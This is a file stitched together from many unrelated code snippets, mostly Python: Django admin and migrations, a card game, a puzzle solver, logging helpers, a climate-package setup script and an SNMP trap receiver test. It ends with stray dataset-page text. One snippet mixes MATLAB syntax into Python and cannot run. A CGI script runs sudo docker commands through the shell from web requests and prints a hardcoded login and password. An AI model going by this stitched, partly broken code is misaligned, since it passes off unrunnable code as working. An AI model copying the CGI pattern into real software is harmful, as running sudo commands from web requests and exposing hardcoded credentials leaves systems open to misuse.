add_fieldsets = BaseUserAdmin.add_fieldsets + (
(None,
{'fields':('email','first_name','last_name')}),
)
ordering = ('username',)
inlines = [UserProfileInline,]
# dans la list_display il est possible de mettre le nom d'une méthode de la classe
# attention à la gestion des manyToManyField, voir la doc sur list_display de ModelAdmin
list_display = ('username','slug_username','email','first_name','last_name','imageProfil',
'is_active','is_staff','is_superuser')
search_fields = ('username', 'last_name', 'first_name','email')
def slug_username(self,obj):
"""Retourne le champ slug_username de UserProfile """
# Pour récuperer le champ d'un OneToOneField (dans les 2 sens),
# on fait: obj.nomclasseEnMinuscule.nomChamp
return obj.userprofile.slug_username
def imageProfil(self,obj):
""" Retourne l'image de profil du UserProfile """
return obj.userprofile.imageProfil
|
from deck import Deck
from hand import Hand
class GameController():
def __init__(self, player_count):
self.game_deck = Deck()
self.game_deck.fill_deck()
self.game_deck.shuffle()
self.discard_deck = Deck()
self.player_hands = []
for _ in range(player_count):
self.player_hands.append(Hand(input("Enter name of player: ")))
def setup_game(self):
for _ in range(7):
for hand in self.player_hands:
hand.draw_card(self.game_deck)
def display_hands(self):
for hand in self.player_hands:
hand.display_hand()
|
#!/usr/bin/python3
import sys
from datetime import datetime
import timeit
# Global variables
pwlist = []
result01 = 0
result02 = 0
# Functions
def part01():
global pwlist
global result01
sum = 0
for pwline in pwlist:
unique_pw = set()
for pw in pwline:
unique_pw.add(pw)
if (len(pwline) == len(unique_pw)):
sum += 1
result01 = sum
def part02():
global pwlist
global result02
sum = 0
for pwline in pwlist:
unique_pw = set()
for pw in pwline:
pw = ''.join(sorted(pw))
unique_pw.add(pw)
if (len(pwline) == len(unique_pw)):
sum += 1
result02 = sum
def bench(part=0, filename=''):
global pwlist
pwlist = []
if filename != '':
with open(filename, 'r') as f:
for line in f:
pwlist.append(line.rstrip().split(' '))
if part == 1:
duration01 = timeit.timeit("part01()", setup="from day04 import part01", number=1)
print(4, 1, result01, int(duration01 * 10 ** 6))
elif part == 2:
duration02 = timeit.timeit("part02()", setup="from day04 import part02", number=1)
print(4, 2, result02, int(duration02 * 10 ** 6))
# Main
if __name__ == '__main__':
with open(sys.argv[1], 'r') as f:
for line in f:
pwlist.append(line.rstrip().split(' '))
duration01 = timeit.timeit("part01()", setup="from __main__ import part01", number=1)
print(4, 1, result01, int(duration01 * 10 ** 6))
duration02 = timeit.timeit("part02()", setup="from __main__ import part02", number=1)
print(4, 2, result02, int(duration02 * 10 ** 6))
|
import os
import scipy.io as sio
import DictionaryLearning.ODL as ODL
import set_params
import numpy as np
def dictionaryLearning(X):
k = set_params.k
clf = ODL.ODL(k, lambd=0.01)
dic, cof = clf.fit(X, verbose=True, iterations=10)
return dic, cof
def main(featurePath):
if not os.path.exists(featurePath):
print("featurePath not exist!")
features = os.listdir(featurePath)
matrixList = []
for v in features:
if not v.endswith('.mat'):
features.remove(v)
for C3DFeature in features:
featureMatrix = sio.loadmat(os.path.join(featurePath, C3DFeature)).get('reduceDimFeature')
matrixList.append(featureMatrix)
X = np.concatenate(tuple(matrixList), axis=0)
print("Online Dictionary Learning (ODL)")
dic, cof = dictionaryLearning(X.T)
sio.savemat(os.path.join(os.path.dirname(featurePath), "Train_dic_cof.mat"), {'dic': dic, 'cof': cof})
if __name__ == '__main__':
trainFeaturePath = "C:/Users/admin/Documents/Surveillance/UCSD_Anomaly_Dataset.v1p2/UCSDped1/Test_reduce_dim_feature"
main(trainFeaturePath)
|
srcDir = "/srv/unmix-server/1_sources/RockBand-GuitarHero/"
destDir = "/srv/unmix-server/2_prepared/RockBand-GuitarHero/"
# Handle multitrackdownloads-alphanumeric
# This folder contains mogg files (sometimes directly in song folder, sometimes in subfolder).
# Take those and convert them with ffmpeg.
import subprocess
import glob, os
from shutil import copy
os.chdir(srcDir + "multitrackdownloads-alphanumeric")
for file in glob.glob("**/*.mogg"):
print(file)
copy(file, destDir)
file = destDir + os.path.basename(file)
# The mogg files can't be processed with ffmpeg without this modification
# Modify file: find occurrence of "OggS" in binary mogg file and remove everything before it
with open(file, 'rb') as f:
s = f.read()
occurrenceOgg = s.find(b'\x4F\x67\x67\x53')
s = s[occurrenceOgg:]
with open(file + "_fixed.mogg", "wb") as f2:
f2.write(s)
os.remove(file)
file = file + "_fixed.mogg"
extractFolder = destDir + os.path.basename(file) + "_extract/"
os.mkdir(extractFolder)
numChannels = subprocess.check_output("ffprobe -show_entries stream=channels -of compact=p=0:nk=1 -v 0 \"" + file + "\"", shell=True)
print(str(numChannels))
for i in range(int(numChannels)):
subprocess.check_call("ffmpeg -i \"" + file + "\" -map_channel 0.0." + str(i) + " \"" + extractFolder + str(i) + ".wav\"", shell=True)
|
# Generated by Django 2.2.4 on 2019-09-29 11:00
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('residents', '0003_resident_default_lot'),
]
operations = [
migrations.AlterField(
model_name='request',
name='lot',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='residents.Lot', verbose_name='House No.'),
),
migrations.AlterField(
model_name='resident',
name='lot',
field=models.ManyToManyField(through='residents.ResidentLotThroughModel', to='residents.Lot', verbose_name='House No.'),
),
migrations.AlterField(
model_name='residentlotthroughmodel',
name='lot',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='residents.Lot', verbose_name='House No.'),
),
]
|
import logging
import logging.config
from pathlib import Path
logging.config.fileConfig(str(Path(__file__).parents[1] / 'config' / 'log.ini'))
def get_logger(logger_name):
return logging.getLogger(logger_name)
|
class Solution:
# @param A : integer
# @param B : integer
# @return an integer
def gcd(self, A, B):
if A == 0:
return B
else:
o = self.gcd(B%A , A)
return o
|
#!/usr/bin/python2
import cgitb,cgi,commands,random
print "Contant-type:text/html"
print ""
cgitb.enable()
x=cgi.FieldStorage()
n=x.getvalue("num")
u=x.getvalue('uname')
p=x.getvalue('pas')
port=random.randint(6000,7000)
commands.getoutput("sudo systemctl restart docker")
print "<html>"
print "access your container using links:"
print "<br>"
print "</html>"
for i in range(int(n)) :
ip=commands.getstatusoutput("sudo docker run -itd -p "+ str(port)+":4200 rahul14 ")
#commands.getoutput("sudo docker attach "+u+" ")
commands.getoutput("sudo docker exec -t "+ip[1]+" service shellinaboxd restart")
#commands.getoutput("sudo service shellinaboxd restart")
#ip=commands.getoutput("sudo hostname -i")
print "<html>"
print " <a href='http://192.168.43.103:"+ str(port)+"' target='_blank'> Container " + str(i) +" </a>"
print "access containers using login - ritesh ; password - redhat "
print "</html>"
|
import numpy as np
## aligning moment compliance test
data=[[0,0],[0.5401,13.7340],[1.0801,30.2148],[1.2463,41.2020],[1.5372,61.8030],[1.6203,75.5370],[1.9944,89.2710],[2.0774,103.0050]]
defl=data(:,1)
Nm=data(:,2)
nf=np.linspace(-100,100,21)
##fitting the data to a parametric curve
options = optimset('MaxFunEvals',100000,'MaxIter',100000,'Display','final');
AMC = [0.5 100];
AMC = lsqcurvefit('enf_fcn',AMC, Nm, defl,[],[],options)
enf1=enf_fcn(AMC, nf);
%%plot of fit and of original data
figure
hold on
plot(Nm,defl)
plot(nf,enf1,'ro-')
legend('Experimental values','Parametrised representation','Location', 'NorthWest')
text(60,.5,{['Enfb= ' num2str(AMC(1))],['Enfc= ' num2str(AMC(2))]})
xlabel('Aligning Moment (Nm)')
ylabel('Aligning Moment Steer Compliance (deg/100Nm per wheel)')
grid
title('Two Parameter Nonlinear Compliance Steer Model')
|
import setuptools
import versioneer
LONG_DESCRIPTION = """
**aospy**: automated gridded climate data analysis and management
A framework that enables automated calculations using gridded climate data.
Following some basic description of where your data lives and defining any
functions of variables stored in that data you want to compute, aospy enables
you to fire off an arbitrary number of calculations using that data.
Important links
---------------
- HTML documentation: http://aospy.readthedocs.io/en/latest
- Mailing list: https://groups.google.com/d/forum/aospy
- Issue tracker: https://github.com/spencerahill/aospy/issues
- Source code: https://github.com/spencerahill/aospy
"""
setuptools.setup(
name="aospy",
version=versioneer.get_version(),
cmdclass=versioneer.get_cmdclass(),
packages=setuptools.find_packages(),
author="aospy Developers",
author_email="aospy@googlegroups.com",
description="Automated gridded climate data analysis and management",
long_description=LONG_DESCRIPTION,
install_requires=['numpy >= 1.7',
'scipy >= 0.16',
'pandas >= 0.15.0',
'netCDF4 >= 1.2',
'toolz >= 0.7.2',
'dask >= 0.14',
'distributed >= 1.17.1',
'xarray >= 0.14.1',
'cloudpickle >= 0.2.1',
'cftime >= 1.0.0'],
tests_require=['pytest >= 3.3'],
package_data={'aospy': ['test/data/netcdf/*.nc']},
scripts=['aospy/examples/aospy_main.py',
'aospy/examples/example_obj_lib.py'],
license="Apache",
keywords="climate science netcdf xarray",
url="https://github.com/spencerahill/aospy",
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering :: Atmospheric Science'
]
)
|
mail=input("Please, enter your maila address E.g (abc@def.com)")
referenceMail="ceng113@iyte.edu.tr"
if '@' in mail:
mail=mail.lower()
part1=mail.split('@')[0]
part1=part1.replace('.','')
part_2 = mail.split("@")[1]
mail = part1 + "@" + part_2
print(mail)
if mail == referenceMail:
print("Equal")
else:
print("Not equal")
print("Not equal")
|
# Dependencies
from selenium import webdriver
from selenium.webdriver.firefox.options import Options
from bs4 import BeautifulSoup
# Use selenium to grab html on site (after waiting for site to fully load)
def get_html(url, wait):
print("\nStarting headless Firefox driver!")
print(f"Navigating to {url}")
print(f"Waiting {wait} seconds...\n")
options = Options()
options.headless = True
driver = webdriver.Firefox(options=options)
driver.get(url)
driver.implicitly_wait(wait)
html = driver.page_source
driver.close()
return html
def get_search_results():
with open ("html_dump.html", "r", encoding="utf-8") as f:
contents = f.read()
soup = BeautifulSoup(contents, "lxml")
# print(soup.prettify())
search_results = soup.find_all("a", class_="videomodal")
search_results_html = str(search_results)
with open("search_results.html", "w+", encoding="utf-8") as f:
f.write(search_results_html)
return search_results_html
url = 'https://factba.se/search#barron%2Bpositive'
html = get_html(url, wait=5)
with open('html_dump.html', 'w+', encoding='utf-8') as f:
f.write(html)
# soup = BeautifulSoup(html_string, "html.parser")
# print(soup.prettify())
# print(soup.head.prettify())
# print(soup.head.title.text.strip())
# print(soup.title.text)
# print(soup.p.text)
# p_tags = soup.find_all("p")
# for p_tag in p_tags:
# print(p_tag.text)
# print(type(soup.head))
# print([p.text.strip() for p in soup.find(id="div-3").find_all("p")])
# print([p.text.strip() for p in soup.find(class_="class-1").find_all("p")])
|
import web_scrape as client
print client.get_property_by_zpid(83154148)
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from enum import Enum
from pants.util.osutil import get_normalized_arch_name, get_normalized_os_name
class PlatformError(Exception):
"""Raise when an attempt is made to execute a process on a platform where it cannot succeed.
E.g., because it requires a tool that is not supported on the platform.
"""
class Platform(Enum):
linux_arm64 = "linux_arm64"
linux_x86_64 = "linux_x86_64"
macos_arm64 = "macos_arm64"
macos_x86_64 = "macos_x86_64"
@property
def is_macos(self) -> bool:
return self in [Platform.macos_arm64, Platform.macos_x86_64]
@classmethod
def create_for_localhost(cls) -> Platform:
"""Creates a Platform instance for localhost.
This method should never be accessed directly by `@rules`: instead, to get the currently
active `Platform`, they should request a `Platform` as a positional argument.
"""
return Platform(f"{get_normalized_os_name()}_{get_normalized_arch_name()}")
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2020-01-17 15:37
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('user', '0003_auto_20200117_1532'),
]
operations = [
migrations.AlterField(
model_name='account',
name='bank_no',
field=models.IntegerField(max_length=19, verbose_name='银行卡号'),
),
]
|
import logging
import logging.handlers
import appdirs
import os
log_dir = appdirs.user_log_dir('nab')
log_file = os.path.join(log_dir, 'log.txt')
def _init():
log = logging.getLogger("nab")
log.setLevel(logging.DEBUG)
log.propagate = False
formatter = logging.Formatter('%(asctime)s: %(levelname)s:\t'
'%(name)s:\t%(message)s')
# create log directory
try:
os.makedirs(log_dir)
except OSError:
pass
file_handler = logging.handlers.RotatingFileHandler(
log_file, maxBytes=1024*1024, backupCount=5)
file_handler.setFormatter(formatter)
log.addHandler(file_handler)
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.INFO)
stream_handler.setFormatter(formatter)
log.addHandler(stream_handler)
return log
log = _init()
|
# ============LICENSE_START=======================================================
# Copyright (c) 2019-2022 AT&T Intellectual Property. All rights reserved.
# ================================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============LICENSE_END=========================================================
import datetime
import glob
import io
import json
import os
from pathlib import Path
import sys
import tempfile
import unittest
from unittest.mock import patch
import snmptrapd
import trapd_settings as tds
import trapd_runtime_pid
import trapd_io
class test_trapd_io(unittest.TestCase):
"""
Test the save_pid mod
"""
class PseudoFile():
""" test file-like object that does nothing """
def write(self):
pass
def close(self):
pass
class WriteThrows():
""" test file-like object that throws on a write """
def write(self):
raise RuntimeError("close() throws")
@classmethod
def setUpClass(cls):
tds.init()
snmptrap_dir = "/tmp/opt/app/snmptrap"
try:
Path(snmptrap_dir + "/logs").mkdir(parents=True, exist_ok=True)
Path(snmptrap_dir + "/tmp").mkdir(parents=True, exist_ok=True)
Path(snmptrap_dir + "/etc").mkdir(parents=True, exist_ok=True)
except Exception as e:
print("Error while running %s : %s" % (os.path.basename(__file__), str(e.strerror)))
sys.exit(1)
# fmt: off
tds.c_config = json.loads(
'{ "snmptrapd": { '
' "version": "1.4.0", '
' "title": "ONAP SNMP Trap Receiver" }, '
'"protocols": { '
' "transport": "udp", '
' "ipv4_interface": "0.0.0.0", '
' "ipv4_port": 6162, '
' "ipv6_interface": "::1", '
' "ipv6_port": 6162 }, '
'"cache": { '
' "dns_cache_ttl_seconds": 60 }, '
'"publisher": { '
' "http_timeout_milliseconds": 1500, '
' "http_retries": 3, '
' "http_milliseconds_between_retries": 750, '
' "http_primary_publisher": "true", '
' "http_peer_publisher": "unavailable", '
' "max_traps_between_publishes": 10, '
' "max_milliseconds_between_publishes": 10000 }, '
'"streams_publishes": { '
' "sec_fault_unsecure": { '
' "type": "message_router", '
' "aaf_password": null, '
' "dmaap_info": { '
' "location": "mtl5", '
' "client_id": null, '
' "client_role": null, '
' "topic_url": "http://localhost:3904/events/ONAP-COLLECTOR-SNMPTRAP" }, '
' "aaf_username": null } }, '
'"files": { '
' "runtime_base_dir": "/tmp/opt/app/snmptrap", '
' "log_dir": "logs", '
' "data_dir": "data", '
' "pid_dir": "tmp", '
' "arriving_traps_log": "snmptrapd_arriving_traps.log", '
' "snmptrapd_diag": "snmptrapd_prog_diag.log", '
' "traps_stats_log": "snmptrapd_stats.csv", '
' "perm_status_file": "snmptrapd_status.log", '
' "eelf_base_dir": "/tmp/opt/app/snmptrap/logs", '
' "eelf_error": "error.log", '
' "eelf_debug": "debug.log", '
' "eelf_audit": "audit.log", '
' "eelf_metrics": "metrics.log", '
' "roll_frequency": "day", '
' "minimum_severity_to_log": 2 }, '
'"trap_config": { '
' "sw_interval_in_seconds": 60, '
' "notify_oids": { '
' ".1.3.6.1.4.1.9.0.1": { '
' "sw_high_water_in_interval": 102, '
' "sw_low_water_in_interval": 7, '
' "category": "logonly" }, '
' ".1.3.6.1.4.1.9.0.2": { '
' "sw_high_water_in_interval": 101, '
' "sw_low_water_in_interval": 7, '
' "category": "logonly" }, '
' ".1.3.6.1.4.1.9.0.3": { '
' "sw_high_water_in_interval": 102, '
' "sw_low_water_in_interval": 7, '
' "category": "logonly" }, '
' ".1.3.6.1.4.1.9.0.4": { '
' "sw_high_water_in_interval": 10, '
' "sw_low_water_in_interval": 3, '
' "category": "logonly" } } }, '
'"snmpv3_config": { '
' "usm_users": [ { '
' "user": "usr-sha-aes256", '
' "engineId": "8000000001020304", '
' "usmHMACSHAAuth": "authkey1", '
' "usmAesCfb256": "privkey1" }, '
' { "user": "user1", '
' "engineId": "8000000000000001", '
' "usmHMACMD5Auth": "authkey1", '
' "usmDESPriv": "privkey1" }, '
' { "user": "user2", '
' "engineId": "8000000000000002", '
' "usmHMACSHAAuth": "authkey2", '
' "usmAesCfb128": "privkey2" }, '
' { "user": "user3", '
' "engineId": "8000000000000003", '
' "usmHMACSHAAuth": "authkey3", '
' "usmAesCfb256": "privkey3" } '
'] } }'
)
# fmt: on
tds.json_traps_filename = (
tds.c_config["files"]["runtime_base_dir"] + "/json_traps.json"
)
tds.arriving_traps_filename = (
tds.c_config["files"]["runtime_base_dir"] + "/arriving_traps.log"
)
def test_open_eelf_error_file(self):
"""
Test bad error file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf error logs
tds.c_config["files"]["eelf_error"] = "/bad_dir/error.log"
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_debug_file(self):
"""
Test bad debug file location
"""
# open eelf debug logs
with patch.dict(tds.c_config["files"]):
tds.c_config["files"]["eelf_debug"] = "/bad_dir/debug.log"
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_audit_file(self):
"""
Test bad audit file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf debug logs
tds.c_config["files"]["eelf_audit"] = "/bad_dir/audit.log"
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_metrics_file(self):
"""
Test bad metrics file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf debug logs
tds.c_config["files"]["eelf_metrics"] = "/bad_dir/metrics.log"
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_error_file_missing_name(self):
"""
Test bad error file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf error logs
del tds.c_config["files"]["eelf_error"]
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_debug_file_missing_name(self):
"""
Test bad debug file location
"""
# open eelf debug logs
with patch.dict(tds.c_config["files"]):
del tds.c_config["files"]["eelf_debug"]
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_audit_file_missing_name(self):
"""
Test bad audit file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf debug logs
del tds.c_config["files"]["eelf_audit"]
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_open_eelf_metrics_file_missing_name(self):
"""
Test bad metrics file location
"""
with patch.dict(tds.c_config["files"]):
# open eelf debug logs
del tds.c_config["files"]["eelf_metrics"]
# try to open file in non-existent dir
with self.assertRaises(SystemExit):
result = trapd_io.open_eelf_logs()
def test_roll_all_logs_not_open(self):
"""
Test roll of logs when not open
"""
# try to roll logs when not open. Shouldn't fail
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_all_logs(self):
"""
Test rolling files that they are open
"""
trapd_io.open_eelf_logs()
# try to roll logs
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_all_logs_roll_file_throws(self):
"""
Test rolling files that they are open
but roll_file throws an exception
"""
trapd_io.open_eelf_logs()
# try to roll logs
with patch('trapd_io.roll_file') as roll_file_throws:
roll_file_throws.side_effect = RuntimeError("roll_file() throws")
with self.assertRaises(SystemExit):
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_all_logs_open_eelf_logs_returns_false(self):
"""
Test rolling files that they are open
but open_eelf_logs returns false
"""
trapd_io.open_eelf_logs()
# try to roll logs
with patch('trapd_io.open_eelf_logs') as open_eelf_logs_throws:
open_eelf_logs_throws.return_value = False
with self.assertRaises(SystemExit):
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_all_logs_open_file_json_traps_throws(self):
"""
Test rolling files that they are open
but open_file(json_traps_filename) throws an exception
"""
def tmp_func(nm):
if nm == tds.json_traps_filename:
raise RuntimeError("json_traps_filename throws")
return test_trapd_io.PseudoFile()
trapd_io.open_eelf_logs()
# try to roll logs
with patch('trapd_io.open_file') as open_file_throws:
open_file_throws.side_effect = tmp_func
with self.assertRaises(SystemExit):
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_all_logs_open_file_arriving_traps_throws(self):
"""
Test rolling files that they are open
but open_file(arriving_traps_filename) throws an exception
"""
def tmp_func(nm):
if nm == tds.arriving_traps_filename:
raise RuntimeError("arriving_traps_filename throws")
return test_trapd_io.PseudoFile()
trapd_io.open_eelf_logs()
# try to roll logs
with patch('trapd_io.open_file') as open_file_throws:
open_file_throws.side_effect = tmp_func
with self.assertRaises(SystemExit):
trapd_io.roll_all_logs()
self.assertIsNotNone(tds.eelf_error_fd)
def test_roll_file(self):
"""
Test roll of individual file when not present
"""
# try to roll a valid log file
with tempfile.TemporaryDirectory() as ntd:
fn = ntd + "/test.log"
with open(fn, "w") as ofp:
self.assertTrue(trapd_io.roll_file(fn))
# The file will be renamed to something like
# test.log.2022-08-17T20:28:32
self.assertFalse(os.path.exists(fn))
# We could also add a test to see if there is a file
# with a name like that.
files = list(glob.glob(f"{ntd}/*"))
print(f"files={files}")
self.assertEqual(len(files), 1)
self.assertTrue(files[0].startswith(fn + "."))
def test_roll_file_not_present(self):
"""
Test roll of individual file when not present
"""
# try to roll logs when not open
self.assertFalse(trapd_io.roll_file("/file/not/present"))
def test_roll_file_no_write_perms(self):
"""
try to roll logs when not enough perms
"""
with tempfile.TemporaryDirectory() as no_perms_dir:
# no_perms_dir = "/tmp/opt/app/snmptrap/no_perms"
no_perms_file = "test.dat"
no_perms_fp = no_perms_dir + "/" + no_perms_file
# required directory tree
#try:
# Path(no_perms_dir).mkdir(parents=True, exist_ok=True)
# os.chmod(no_perms_dir, 0o700)
#except Exception as e:
# self.fail("Error while running %s : %s" % (os.path.basename(__file__), str(e.strerror)))
# create empty file
open(no_perms_fp, "w").close()
os.chmod(no_perms_dir, 0o555)
# try to roll file in dir with no write perms
self.assertFalse(trapd_io.roll_file(no_perms_fp))
# the file should still be there
open(no_perms_fp).close()
# allow the directory to be removed
os.chmod(no_perms_dir, 0o700)
def test_open_file_exists(self):
"""
Test file open in directory present
"""
# create copy of snmptrapd.json for pytest
test_file = "/tmp/snmptrap_pytest"
# try to roll logs when not open
result = trapd_io.open_file(test_file)
self.assertTrue(str(result).startswith("<_io.TextIOWrapper name="))
self.assertIsInstance(result, io.TextIOWrapper)
def test_open_file_exists_does_not_exist(self):
"""
Test file open in directory present
"""
# create copy of snmptrapd.json for pytest
test_file = "/tmp/no_such_dir/snmptrap_pytest"
# try to open file when dir not present
with self.assertRaises(SystemExit):
result = trapd_io.open_file(test_file)
def test_close_file_exists(self):
"""
Test closing a file that's present
"""
# create copy of snmptrapd.json for pytest
test_file_name = "/tmp/snmptrap_pytest"
test_file = trapd_io.open_file(test_file_name)
# close active file
self.assertTrue(trapd_io.close_file(test_file, test_file_name))
def test_close_file_does_not_exist(self):
"""
Test closing non-existent file
"""
# try to roll logs when not open
self.assertFalse(trapd_io.close_file(None, None))
def test_ecomp_logger_type_error(self):
"""
test trapd_io.ecomp_logger
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_ERROR, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
def test_ecomp_logger_type_error_bad_fd(self):
"""
test trapd_io.ecomp_logger, but write() throws
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
# the following SHOULD be done with a context patch
sv_eelf_error_fd = tds.eelf_error_fd
tds.eelf_error_fd = test_trapd_io.WriteThrows()
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_ERROR, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
tds.eelf_error_fd = sv_eelf_error_fd
def test_ecomp_logger_type_unknown_bad_fd(self):
"""
test trapd_io.ecomp_logger, unknown type, but write() throws
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
# the following SHOULD be done with a context patch
sv_eelf_error_fd = tds.eelf_error_fd
tds.eelf_error_fd = test_trapd_io.WriteThrows()
self.assertFalse(trapd_io.ecomp_logger(-1, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
tds.eelf_error_fd = sv_eelf_error_fd
def test_ecomp_logger_type_metrics(self):
"""
test trapd_io.ecomp_logger to metrics
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_METRICS, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
def test_ecomp_logger_type_metrics_bad_fd(self):
"""
test trapd_io.ecomp_logger to metrics, but write() throws
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
# the following SHOULD be done with a context patch
sv_eelf_metrics_fd = tds.eelf_metrics_fd
tds.eelf_metrics_fd = test_trapd_io.WriteThrows()
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_METRICS, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
tds.eelf_metrics_fd = sv_eelf_metrics_fd
def test_ecomp_logger_type_audit(self):
"""
test trapd_io.ecomp_logger to audit log
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_AUDIT, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
def test_ecomp_logger_type_audit_bad_fd(self):
"""
test trapd_io.ecomp_logger to audit log, but write() throws
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
# the following SHOULD be done with a context patch
sv_eelf_audit_fd = tds.eelf_audit_fd
tds.eelf_audit_fd = test_trapd_io.WriteThrows()
self.assertTrue(trapd_io.ecomp_logger(tds.LOG_TYPE_AUDIT, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
tds.eelf_audit_fd = sv_eelf_audit_fd
def test_ecomp_logger_type_unknown(self):
"""
test trapd_io.ecomp_logger
"""
trapd_io.open_eelf_logs()
msg = "this is a test"
self.assertFalse(trapd_io.ecomp_logger(-1, tds.SEV_ERROR, tds.CODE_GENERAL, msg))
if __name__ == "__main__": # pragma: no cover
unittest.main()
|
"""-----------------------------------------------------------
SpaCy :
Utterance classification with SpaCy
by comparing extracted tokens from sentences
--------------------------------------------------------------"""
import pandas as pd
import numpy as np
from preprocessing import *
from vectorization_spaCy import *
"""
NLP: class in .csv file
0. Dyads
1. Participant
2. Id
3. EAT
4. StartTime
5. EndTime
6. Duration
7. Utterances
8. Subcategories
9. Categories
"""
""" Step 1: Extract data from file """
dataFile='collaborativeActs.csv'
df = pd.read_csv(dataFile,delimiter="\t",header=None,error_bad_lines=False, encoding="utf8")
#categories, classification of the utterances of the file according to their type
categories = ["Interaction management", "Social relation", "Task management", "Information", "Transactivity", "Tool", "Other"]
ut_by_categ=[[x for x, t in zip (df[7], df[9]) if t == c] for c in categories]
utterances=df[7]
subcategories=df[8]
categories=df[9]
""" Step 2: Preprocessing of data """
utterances_ppng=[normalization(utterance) for utterance in utterances]
tokens=[tokenization(utterance) for utterance in utterances_ppng]
tokens=[ delete_stop_words(token) for token in tokens]
#tokens=[ delete_punctuation(token) for token in tokens]
tokens=[ lemmatization(token) for token in tokens]
""" Step 3: Vectorization of sentences """
#vect=[ vectorization2(token) for token in tokens if not len(token)==0] #### PB à REVOIR : attention à cette étape les [] sont retirés (enlève des sentences)
"""i=0
for token in tokens:
if(len(token)==0):
print(utterances[i])
print(token)
i+=1"""
for k in range(len(utterances)):
print(utterances[k])
print(tokens[k])
if not len(tokens[k])==0:
print(vectorization2(tokens[k]))
print('')
""" Step 4: Classification """
# it might be possible to use cosine similarity with kNN or clustering but it costs lot of memory
|
"""Modoboa limits utilities."""
from . import constants
def get_user_limit_templates():
"""Return defined templates."""
return list(constants.DEFAULT_USER_LIMITS.items())
def get_domain_limit_templates():
"""Return defined templates."""
return list(constants.DEFAULT_DOMAIN_LIMITS.items())
def move_pool_resource(owner, user):
"""Move resource from one pool to another.
When an account doesn't need a pool anymore, we move the
associated resource to the pool of its owner.
"""
for name, _definition in get_user_limit_templates():
user_limit = user.userobjectlimit_set.get(name=name)
if user_limit.max_value < 0:
continue
owner_limit = owner.userobjectlimit_set.get(name=name)
owner_limit.max_value += user_limit.max_value
owner_limit.save()
|
import json,os
def modal():
a='''{% macro modal(id="myModal",body=None) %}
<button type="button" class="btn btn-primary" onclick="showmodal()">
Launch demo modal111
</button>
<button type="button" class="btn btn-primary" data-toggle="modal" data-target="#{{ id }}">
Launch demo modal
</button>
<div class="modal fade" id="{{ id }}" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" >
<div class="modal-dialog" role="document">
<div class="modal-content">
<div class="modal-header">
</div>
<div class="modal-body">
{% if body %}
{{ body() }}
{% endif %}
</div>
<div class="modal-footer">
</div>
</div>
</div>
</div>
<script>
function showmodal() {
$('#{{ id }}').modal({"show":true});
}
</script>
{% endmacro %}'''
return a
print(modal())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.